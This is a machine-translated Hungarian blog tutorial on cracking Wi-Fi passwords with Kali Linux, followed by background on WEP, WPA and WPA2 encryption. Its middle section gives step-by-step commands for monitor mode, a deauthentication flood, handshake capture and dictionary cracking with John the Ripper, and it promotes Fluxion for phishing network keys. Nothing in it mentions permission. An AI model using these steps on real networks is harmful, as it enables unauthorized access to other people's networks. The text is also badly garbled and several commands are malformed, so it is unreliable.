a legtöbb kérdést a Google , hogyan lehet feltörni Wifi segítségével Kali Linux , Hack wifi , hogyan lehet feltörni Wifi segítségével Kali Linux, stb. De először értsd meg, mi a Wifi & titkosítása.
hozzászólás tartalma
- mi az a Wi-Fi, és lehet-e feltörni?
- használt eszközök csapkod WiFi jelszót Kali-Linux
- Airmon-ng
- Aireplay-ng
- Airodump-ng
- Hccap
- Hasfelmetsző János
- Aircrack-ng
- lépéseket, hogy csapkod WiFi segítségével Kali-Linux vagy bármely más Debian Linux operációs rendszer.
- 1. lépés :
- 2. lépés:
- 3. lépés:
- 4. lépés:
- 5. lépés:
- Lépés 6:
- Wifi hacker eszköz :- Fluxion
- vezeték nélküli titkosítás
- WEP titkosítás
- a WEP működése
- WPA titkosítás
- hogyan működik a WPA
- WPA 2 titkosítás
- WPA2 – Personal
- WPA2 – Enterprise
- hogyan működik a WPA2
mi az a Wi-Fi, és lehet-e feltörni?
a Wi-Fi egy népszerű vezeték nélküli hálózati technológia neve, amely rádióhullámokat használ a vezeték nélküli nagysebességű Internet és hálózati kapcsolatok biztosításához. Általános tévhit, hogy a Wi-Fi kifejezés a “vezeték nélküli hűség” rövidítése, azonban ez nem így van. A Wi-Fi egyszerűen egy védjeggyel ellátott kifejezés, amely azt jelenti, hogy IEEE 802.11 x.
amikor bármilyen eszközről wifi hackelésről beszélünk, a wifi biztonsága a legfontosabb. Tehát amikor megpróbáljuk feltörni a wifi-t, nagyon könnyű feltörni vagy feltörni a WPS elérhető Rendszer jelszavát. A WPS a Titkosítás egyik típusa, amelyet a wifi hálózat biztosítására használnak, ezért kezdjük a gyors bemutatóval.
használt eszközök csapkod WiFi jelszót Kali-Linux
főleg az általunk használt kali Linux beépített eszközkészlet csapkod wifi jelszót, amely a következők:
- airmon-ng
- aireplay-ng
- airodump-ng
- hccap
- Hasfelmetsző János
- aircrack-ng
Airmon-ng
ez a szkript használható a monitor mód engedélyezése vezeték nélküli interfészeken. Arra is használható, hogy visszatérjen a monitor módból a felügyelt módba. Az airmon-ng parancs paraméterek nélküli megadása megmutatja az interfészek állapotát.
használat: airmon-ng < start|stop>< interfész>vagy airmon-ng < check|check kill>
Aireplay-ng
Aireplay-ng a keretek befecskendezésére szolgál.
az elsődleges funkció a forgalom generálása az aircrack-ng későbbi használatához a WEP és WPA-PSK kulcsok feltöréséhez. Vannak különböző támadások, amelyek okozhatnak deauthentications céljából elfog WPA kézfogás adatok, hamis hitelesítés, interaktív csomag visszajátszás, kézzel készített ARP request injection és ARP-request reinjection. A packetforge-ng eszközzel tetszőleges keretek hozhatók létre.
a legtöbb illesztőprogramot javítani kell az injekció beadásához.
Airodump-ng
az Airodump-ng nyers 802.11 képkockák csomagrögzítésére szolgál, és különösen alkalmas WEP IV (inicializáló vektor) gyűjtésére az aircrack-ng-vel való felhasználás céljából. Ha van egy GPS-vevő csatlakoztatva a számítógéphez, az airodump-ng képes naplózni a talált Hozzáférési pontok koordinátáit.
ezenkívül az airodump-ng számos fájlt ír ki, amelyek tartalmazzák az összes látott hozzáférési pont és ügyfél adatait.
Hccap
az aircrack-ng capture hash-ek konvertálása .hccapx ezt a parancsot használjuk.
Hasfelmetsző János
a jelszó feltöréséhez a Hasfelmetsző Jánost használjuk az utolsó szakaszban. ezzel az eszközzel összehasonlítjuk a kivonatokat a jelszó szótárral. Sok más módja van, de megpróbáljuk az egyiket.
Aircrack-ng
Aircrack-ng egy komplett eszközcsomagot, hogy értékelje WiFi hálózat biztonságát.
a WiFi biztonság különböző területeire összpontosít:
- ellenőrzés: Packet capture és export adatok szöveges fájlok további feldolgozásra harmadik fél eszközök
- támadó: Replay támadások, deauthentication, hamis Hozzáférési pontok és mások keresztül packet injection
- tesztelés: ellenőrzése WiFi kártyák és a vezető képességeit (capture and injection)
- repedés: WEP és WPA PSK (WPA 1 és 2)
lépéseket, hogy csapkod WiFi segítségével Kali-Linux vagy bármely más Debian Linux operációs rendszer.
minden parancs leírása a fenti ellenőrizze, hogy ha van bármilyen probléma.
1. lépés :
először vegye a hálózati kártyát monitor módba a környező hálózatok figyeléséhez.
#airmon-ng start wlan1
#airodump-ng wlan1mon
2. lépés:
#airodump-ng –bssid 2C:55:D3:B1:35: 0C-c 1-W kalip300 wlan1mon
3. lépés:
#aireplay-ng -0 0-a 2C:55:D3:B1: 35:0C wlan1mon
miután elfog sucsessfully handshak fájlt látunk valami ilyesmit.
4. lépés:
#aircrack-ng kalip300-01.cap-J john
5. lépés:
# hccap2john john.hccap > wpa
Lépés 6:
#john –szólista*/root/Desktop/rockyou.txt / root / Desktop / wpa
és mi sucsessfully csapkod a wifi jelszót kali linux
Wifi hacker eszköz :- Fluxion
a Fluxion egy biztonsági audit és társadalommérnöki kutatási eszköz. Ez egy remake linset által vk496 (remélhetőleg) kevesebb hibát és több funkciót. A parancsfájl megkísérli letölteni a WPA/WPA2 kulcsot egy cél hozzáférési pontról egy social engineering (adathalász) támadás segítségével. Kompatibilis a Kali (rolling) legújabb kiadásával. A Fluxion támadásainak beállítása többnyire kézi, de a kísérleti automatikus mód kezeli a támadások néhány beállítási paraméterét. Olvassa el a GYIK-et, mielőtt kérdéseket kérne.
vezeték nélküli titkosítás
WEP titkosítás
Wired Equivalent Privacy (WEP) egy IEEE 802.11 vezeték nélküli protokoll, amely biztonsági algoritmusokat biztosít az adatok titkosításához vezeték nélküli átvitel során.
a WEP egy 24 bites inicializálási vektort(IV) használ az RC4 adatfolyam titkosításához a titoktartás érdekében, a CRC-32 ellenőrző összeget pedig a vezeték nélküli átvitel integritásához.
a WEP működése
- a CRC-32 ellenőrző összeg az adatok 32 bites integritás-ellenőrzési értékének (ICV) kiszámítására szolgál, amely viszont hozzáadódik az adatkerethez.
2. A WEP-kulcshoz hozzáadunk egy 24 bites tetszőleges számot, amelyet inicializáló vektornak (IV) nevezünk; a WEP-kulcsot és a IV-et együtt WEP-magnak nevezzük.
3. A WEP magot használják az RC4 algoritmus bemeneteként egy kulcsfolyam létrehozásához (a kulcsfolyamot bitenként Xorálják az adatok és az ICV kombinációjával a titkosított adatok előállításához).
4. Az IV mező (IV+PAD+KID) hozzáadódik a rejtjelezett szöveghez a MAC keret létrehozásához
WPA titkosítás
a Wi-Fi Protected Access (WPA) egy 802-es WLAN-alapú adattitkosítási módszer.11 szabványok.
ez egy pillanatkép a 802.11 i-ről (fejlesztés alatt), amely erősebb titkosítást biztosít, és lehetővé teszi a PSK-t az EAP hitelesítéshez.
hogyan működik a WPA
az időbeli titkosítási kulcs, az átviteli cím és a TKIP szekvenciaszámláló (TSC) az RC4 algoritmus bemeneteként szolgál a keystram létrehozásához.
a MAC Service Data Unit (MSDU) és az message intergrity check (mic) a Michael algoritmust használja.
az MSDU és a MIC kombinációja széttöredezett a MAC Protocol Data Unit (MPDU) létrehozásához.
32 bites integritás-ellenőrzési érték (ICV) kerül kiszámításra az MPDU
az MPDU és az ICV kombinációja bitenként Xorizálódik a Keysteam segítségével a titkosított adatok előállításához
az IV hozzáadódik a titkosított adatokhoz a MAC keret létrehozásához.
WPA 2 titkosítás
a WPA 2 erősebb adatvédelmet és hálózati hozzáférés-vezérlést biztosít a vállalati és WI-FI felhasználók számára
kormányzati szintű biztonságot nyújt a Nemzeti Szabványügyi és Technológiai Intézet (NIST) FIPS 140-2 kompatibilis AES titkosítási algoritmus végrehajtásával.
WPA2 – Personal
WPA2 – Personal beállító jelszót (előre megosztott kulcsot) használ a jogosulatlan hálózati hozzáférés védelmére.
PSK módban minden vezeték nélküli hálózati eszköz egy 128 bites kulcs segítségével titkosítja a hálózati forgalmat, amely 8-63 ASCII karakterből áll.
WPA2 – Enterprise
magában foglalja az EAP-t vagy a RADIUS-t a központosított ügyfél-hitelesítéshez, több hitelesítési módszerrel, például tokenkártyákkal, Kerberókkal, tanúsítványokkal stb.
a felhasználók bejelentkezési hitelesítő adatait egy központi szerver rendeli hozzá, amelyet a hálózathoz való csatlakozáskor be kell mutatniuk.
hogyan működik a WPA2
a WPA2 CCMP implementációjában a Mac fejlécadatokat használják kiegészítő hitelesítési adatok (AAD) létrehozására.
szekvenált csomagszámot (PN) használnak a nonce felépítéséhez.
az adatok titkosításához az AAD, az időbeli kulcs és a nonce, valamint a CCMP használatos.
a WPA2 MAC keret épít a MAC fejléc, CCMP fejléc, titkosított adatok és titkosított MIC
lehet, hogy kimaradt, hogyan lehet feltörni telefon